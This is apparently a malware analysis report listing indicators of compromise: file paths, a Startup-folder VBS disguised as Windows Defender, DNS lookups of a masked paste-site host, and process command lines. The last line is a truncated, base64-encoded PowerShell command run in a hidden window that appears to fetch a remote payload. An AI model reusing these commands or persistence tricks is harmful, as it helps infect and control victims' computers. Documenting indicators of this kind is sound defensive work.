Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender om22.vbs
- $asxzdbjdfdfdf.replace(}}}} as /
- %HOMEPATH%\music\tt.exe
- %HOMEPATH%\music\vvv.vbs
- %HOMEPATH%\music\vvvv.vbs
- %TEMP%\is-8iuus.tmp\tt.tmp
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '%WINDIR%\syswow64\wscript.exe' "%HOMEPATH%\Music\vvvv.vbs"
- '%HOMEPATH%\music\tt.exe'
- '%TEMP%\is-8iuus.tmp\tt.tmp' /SL5="$7001C,16125842,188928,%HOMEPATH%\Music\tt.exe"
- '%WINDIR%\syswow64\wscript.exe' "%HOMEPATH%\Music\vvv.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc JABBAFMAWABaAGQAYgBqAGQAZgBkAGYAZABmACAAPQAgAEAAJwANAAoAaABeAF4AXgBeAHAAcwA6AH0AfQB9AH0AfQB9AH0AfQBwAGEAcwBeAF4AZQBiAGkAbgAuAGMAbwBtAH0AfQB9AH0AcgBhAHcAfQB9AH0AfQB5ADkAZABjADIAVwAy...' (with hidden window)